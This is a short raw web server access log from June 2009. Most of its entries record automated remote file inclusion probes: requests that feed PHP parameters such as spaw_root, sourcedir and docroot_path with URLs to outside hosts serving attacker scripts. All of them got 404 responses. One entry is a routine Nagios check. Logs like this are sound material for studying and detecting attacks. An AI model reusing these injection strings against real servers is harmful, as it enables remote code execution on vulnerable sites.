65.23.158.226 - - [04/Jun/2009:00:54:48 -0400] "GET /logs/access_log.Q109052900/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:54:48 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:55:21 -0400] "GET /logs/access_log.Q109051000/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
65.23.158.226 - - [04/Jun/2009:00:55:21 -0400] "GET /logs/access_log.Q109052900/index.php?redir=http://www.greendream.co.in/mambo/1.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.188.129.126 - - [04/Jun/2009:00:55:23 -0400] "GET /logs/access_log.Q109051100//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.omsklyvr.omit.ru/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
209.59.12.99 - - [04/Jun/2009:00:55:30 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
90.185.249.111 - - [04/Jun/2009:00:57:18 -0400] "GET /logs/access_log.Q109052100/?sourcedir=http://www.telsizdunyasi.com/vnc/fx29id.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
85.10.128.219 - - [04/Jun/2009:00:59:23 -0400] "GET /logs/modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
85.10.128.219 - - [04/Jun/2009:00:59:23 -0400] "GET /modules/tinycontent/admin/spaw/spaw_control.class.php?spaw_root=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
